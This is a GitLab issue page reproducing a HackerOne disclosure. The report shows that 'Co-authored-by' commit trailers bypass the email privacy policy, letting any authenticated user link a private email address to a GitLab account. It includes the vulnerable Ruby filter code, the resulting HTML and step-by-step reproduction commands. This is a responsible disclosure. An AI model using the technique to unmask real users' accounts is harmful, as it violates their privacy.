Skip to content

Authenticated users can find other users by their private email

HackerOne report #1794713 by shells3c on 2022-12-06, assigned to @rshambhuni:

Report | How To Reproduce

Report

Summary

Since GitLab 14.7.1, 14.6.4, and 14.5.4, you can no longer find users by their non-public email, it's the fix for CVE-2022-0371. This is also documented in the official documentation. However, I found that I could still do it just by using a commit trailer, this happens because lib/banzai/filter/commit_trailers_filter.rb uses User.find_by_any_email to find user handle from an email address, and User.find_by_any_email doesn't respect the email policy at all:

    def trailer_filter(text)  
        text.lines.map! do |line|  
          trailer, rest = line.split(':', 2)

          next line unless trailer.downcase.end_with?('-by') && rest.present?

          chunks = rest.split  
          author_email = chunks.pop.delete_prefix('<').delete_suffix('>')  
          next line unless Devise.email_regexp.match(author_email)

          author_name = chunks.join(' ').strip  
          trailer = "#{trailer.strip}:"

          "#{trailer} #{link_to_user_or_email(author_name, author_email, trailer)}\n"  
        end.join  
      end  
      def link_to_user_or_email(name, email, trailer)  
        link_to_user User.find_by_any_email(email),  
          name: name,  
          email: email,  
          trailer: trailer  
      end

Something like below:

commit cd330155a136985ada2c350c854a835afed1fb11 (HEAD -> h1test, origin/h1test)  
Author: me <me@myemail.com>  
Date:   Tue Dec 6 14:36:00 2022 +0700

    Commit message

    Co-authored-by: foo <privateemail@gmail.com>

will be converted to:

<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">  
 <img alt="FULL_NAME's avatar" src="..." class="avatar s16 avatar-inline" title="FULL_NAME">  
</a>  
<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">foo</a>  
&lt;<a href="mailto:privateemail@gmail.com" title="privateemail@gmail.com">privateemail@gmail.com</a> &gt;
Steps to reproduce

I will use my own email address in this test: hacker0x02@gmail.com

  1. Confirm that the email isn't public and can't be searched via the API by visiting https://gitlab.com/api/v4/users?search=hacker0x02@gmail.com

Response:

[]
  1. Create a repository, clone it and do the following:
$ echo test > a.txt  
$ git add -A  
$ git commit -m '.  
>
> Co-authored-by: a <hacker0x02@gmail.com>'  
$ git checkout -b h1test  
$ git push origin h1test  
...
  1. Visit the repository, view Commits and you will find the commit
  2. Expand the commit and click on the avatar, you will be redirected to my Gitlab account
Output of checks

This bug happens on GitLab.com

Impact

Similar to CVE-2022-0371, users can look up accounts with private email addresses

How To Reproduce

Please add reproducibility information to this section: